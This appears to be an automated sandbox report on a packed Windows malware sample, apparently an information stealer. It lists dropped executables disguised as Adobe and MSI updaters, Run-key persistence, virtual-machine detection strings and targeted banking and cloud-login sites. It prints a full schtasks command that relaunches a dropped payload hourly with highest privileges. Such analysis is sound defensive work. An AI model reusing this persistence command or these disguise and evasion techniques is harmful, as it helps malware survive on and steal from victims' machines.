Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msacm32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmmbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmmbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: tMO4FVIc9l.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: tMO4FVIc9l.exe

Static file information: File size 3134976 > 1048576

Source: tMO4FVIc9l.exe

Static PE information: Raw size of .vmp is bigger than: 0x100000 < 0x2f9000

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp

Source: tMO4FVIc9l.exe	Static PE information: section name: .vmp
Source: tMO4FVIc9l.exe	Static PE information: section name: .vmp
Source: tMO4FVIc9l.exe	Static PE information: section name: .vmp

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_00A949ED push ebp; ret	0_2_00A94A32
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_009D9EAB push ebx; iretd	0_2_009D9EDE
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Code function: 0_2_00853F59 push ecx; ret	0_2_00853F6C
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: 7_2_004E4721 push ecx; ret	7_2_004E4734
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: 9_2_00BF4721 push ecx; ret	9_2_00BF4734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0043C609 push ecx; ret	12_2_0043C613
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0043DA48 push ecx; retf	12_2_0043DA4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0043CEA2 push cs; ret	12_2_0043CEA3
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 17_2_00E94721 push ecx; ret	17_2_00E94734
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 20_2_00E94721 push ecx; ret	20_2_00E94734

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\lumma2305[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File created: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Jump to dropped file
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File created: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Jump to dropped file
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File created: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Jump to dropped file

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe

File created: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 HR" /sc HOURLY /rl HIGHEST

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7			Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7			Jump to behavior

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	System information queried: FirmwareTableInformation

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe

Code function: 0_2_00A6400F rdtsc

0_2_00A6400F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5048	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6336	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5484	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5936	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6504	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2664	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2488	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: 7_2_004F4253 FindFirstFileExW,	7_2_004F4253
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: 9_2_00C04253 FindFirstFileExW,	9_2_00C04253
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 17_2_00EA4253 FindFirstFileExW,	17_2_00EA4253
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 20_2_00EA4253 FindFirstFileExW,	20_2_00EA4253

Source: Amcache.hve.15.dr	Binary or memory string: VMware
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: RegAsm.exe, 00000015.00000002.2456254141.000000000144A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: Amcache.hve.15.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2350449893.000000000097A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2352554407.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2244993517.000000000118F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2244993517.000000000114A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.2456254141.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.2498499806.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.15.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: tMO4FVIc9l.exe, 00000000.00000002.2259208520.0000000006130000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}9+DtRuOIzpuPOHMWFCH4SYrrhIIF+VmRVSkbN671zwLeLYomOj6BxuG4WR0H8+Rivo4a5BAWT1bV5dHpshkYrOka+p8vn3VPA9qlgL8Tk27kWvHNRJXPl7UkYvCoDMNFU/36++C/jG6pgvhw/J6+PCmsW1ynBiLNzuR9AXJKT6RtkzVJ5JXS6W4LXIi22NeLtP7Ikk+0n7QDGjovSf2FNmrxFItlk5hpx/2HxYs7bUXx8wlhYhOe6vmYTYhwDGkC95TfsGbkuhMXPDu24Tk7yZ0vkv8IwoJIe02kWQ6IIm9jZj5kyhHMSGTfMV1KramijuIQ61Lh4JuwhDKy5sdv4lPBppbXLx9SLeTS6Kn4usBfnhOPZZ7l5cpc73VFZYd77s7LnUzNMXxxIpimnULqgLSaHyIqzMQjKsPItp3JQyx5CerGBHz+72bou4eRv4TJR7md171SZI7d8swF+mIEVAJCa+4QbnpduN+YKaqd+XlImpqvGTlKejMnbf5C3VoY6JqyIprHM127oDjSKid9WWwYkCjOIWoJ9cPNs1rEHZ7g0TIw+CKfhqUxdWSSZy1s0xEmvRteTep7wHsWEq3bric1I0yUTA1xPBeKNpfYj0KIFBfGvzhZMFqKcVarTu4qW7iA/0/ou6h8oRON7pvR/Drqz1sh2V/nTyeLJBoScoTC2kP+Z5joN7z4enaTfObIPJ73aAl7nk82ybN7HgXREVh9sTgLim/ZFJ5ILI8FVqHlTjEcHZYzg3iLhWWXwtL8duCV9PO06EahABTLaH/dJMlgRfEm+xqei1EiLMQRE1A3wjzPysQesfpyIP7QZIIOwr8Fac1720ciptOJHnqRhOYMUatUHgvBfyvSdxZFncyCHH8s5lxNPR9Ckhzt/OyLoXmbZmd7lnu+m7uljsgn0XpsdfOO+Hb6A8sp3Lny7Crg5eEH7FkVTGHF1dB5sUfLHUBgegCLm9az5mP4IHm53G3d6FaRVSjxbt/cmY1A4yoMWgbu753WBLmKf7XoP0a3ATliu2meo4ycXIQcFDZxSBsE/n8lIc9Rjs7JH9hU+UalUXvLlk3QUNIdExIuU0zLb9VKS5YYAUp8v1L58qp6JEfI2T1GH8BNpLTSa1mvlaKprJUJIpnWr30WVhfG1wRno7Ou3cF2tpP3xF2pkOU5vy86XhhyxlqE9HTLQYUMojgV8q9ODzUXLbxWzK/ZKI3rkrIGFkZmRdr0WffmX91WbitQH63DCEnQ3rutG1DBIXV73QYXkiqmMW8Vu+F6IYaFLPFibpYCvWdqa5euzm4wASrFl7hx59wixe916VrWor7/LR1RwbfRM3ZDHiA9d+r6uLhAvkHE/7GY8XhfjaF3eiso7gDvw56tlyKHcJ9locNvwwauttSLO9tH2h4ABpfxVeWp5cNhRjml3ecGiVDs4vikm7dU4OOrv4FdDu3621TEC0ZAvx3cJzKlwVHqcJLgEQoOC9dwoKN8VJSL1Uo6cd8X/oURNbmKMNyh3jqv8o3J29EtLi4ZBGlmf8ljmlqYy97XCx4/+XmHd8a7VK/ZK+ox1GWo1ve2zhapCJZntBNUx2+Ab5E8v7CAFVcOpXvV+AAAxe3TeLs943LDxb4iTGvD6fIRB4J6ZR6jI+EPw959sgDkaVvANG7Nr72KQ8LuBIgyQfqf+m+iHiUj4SLub8eUbGXr45sj5eH6SVxU0CxrdR34NEWUjCII5KmpCckr5zRxXbaffxgnZdm2vKKO081W1smR0p8/nOBzQ8DI3feQCIChRSRIOORV9wT6RphUcA0b4nNYsG/2swVxRBK8YOLh3g0mmEmUKjzBNi369LJUIgTx1nP/
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Amcache.hve.15.dr	Binary or memory string: vmci.sys
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2B
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Amcache.hve.15.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.15.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.15.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.15.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.15.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.15.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.15.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: tMO4FVIc9l.exe, 00000000.00000003.2147630873.000000000613F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjo
Source: Amcache.hve.15.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.15.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.15.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.15.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Amcache.hve.15.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.15.dr	Binary or memory string: vmci.syshbin
Source: RegAsm.exe, 00000019.00000002.2498499806.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWhf
Source: Amcache.hve.15.dr	Binary or memory string: VMware, Inc.
Source: tMO4FVIc9l.exe, 00000000.00000003.2092231965.00000000014C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: tMO4FVIc9l.exe, 00000000.00000003.2153594744.000000000614F000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2153450957.000000000614B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: YKpEXhNQ4LhdYiADEA6OJjsMUXFJKIDUh4dyJpiEbehY8xIhAvThNKKRcv0Q3mFBaMYnhF4fO1h6ZMFsw1XStckRVu+LYDkoBAWriOp3mrhmjo9a+gZHWRMVWxqhmGkwPDYyjKMCw0Og3WVeEka+xsvn29TtmTfWbTJ0IYJkyXVZTogEvk0Ug/cTvdVBjxCPm0bNBY/sA3VxFhkhdzQsFcLBz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6nrkdzDfsQ7pfwBivJDdeBjyC8ZBrYMHeatMrX4SJ1l2vEDg/GZZwN3qvaQEOk1nsYI0nQhADMY/hZsIxYmq3ilFF3yHgGzY6tEzFmBea/UBzFhAmYb1oqHrA2HYnHoIDc0qDg5jN/iSm+UGwHYbQqqkRJVpdhCsWfEsDQs2YatlmgMvGsygRH9PIZM241n1Wg2QJriGdD15v8AEBGUz5wmlUAhSdeuRka5XGneIZTmGpDHsAMQJpeyqP8xYFGCRUAjTnqs8pnAw7ZfJaRM+v+EFLwrtaPnqkMBbgxavDBYWANPixOUg4B+VzjJUjJYCBsUJclzNAchyM4pexDM02OhsoxyzrVD0C6Arsg91oEjxRVPKLcNQkNKVbxTCUW6soC2egI